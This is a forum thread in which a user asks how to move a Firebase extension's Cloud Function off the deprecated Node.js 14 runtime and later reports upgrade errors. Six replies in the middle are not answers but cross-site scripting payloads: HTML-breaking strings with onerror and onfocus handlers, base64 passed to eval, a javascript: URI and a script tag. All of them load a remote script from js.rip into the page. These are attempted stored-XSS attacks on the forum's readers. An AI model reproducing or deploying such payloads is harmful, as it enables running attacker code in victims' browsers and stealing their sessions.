Question

Firebase extension google cloud function runtime version

  • 1 November 2023
  • 8 replies
  • 423 views

Badge +5

I’ve just installed the Firebase Extension and I see it on Google Functions page but the runtime version has a warning: 

Node.js 14 will be deprecated on Jan 30, 2024. Please update this function using the latest runtime version available.

Any idea how to update it to the latest or min suggested version?

 


8 replies

Badge +1

xss

Badge +1

"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3hmdXd0eG5zMjkiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>

Badge +1

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3hmdXd0eG5zMjkiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Badge +1

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3hmdXd0eG5zMjkiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>

Badge +1

javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/xfuwtxns29\';document.body.appendChild(a)')

Badge +1

"><script src="https://js.rip/xfuwtxns29"></script>

Badge +5

I tried to upgrade and now getting errors.

Service account ext-firestore-revenuecat--dr0f already exists within project projects/my-project
that was during the upgrade of the extension.

 

now when trying to receive an event I get:

InvalidApiVersionError: The version of this extension is not the same. Extension version 0.1.12, Api version: 0.1.7. Please retry the request with the correct version

Badge +4

The new updated firebase extension is published and you can update
I’ve also asked for it 
https://github.com/RevenueCat/firestore-revenuecat-purchases/issues/65

Reply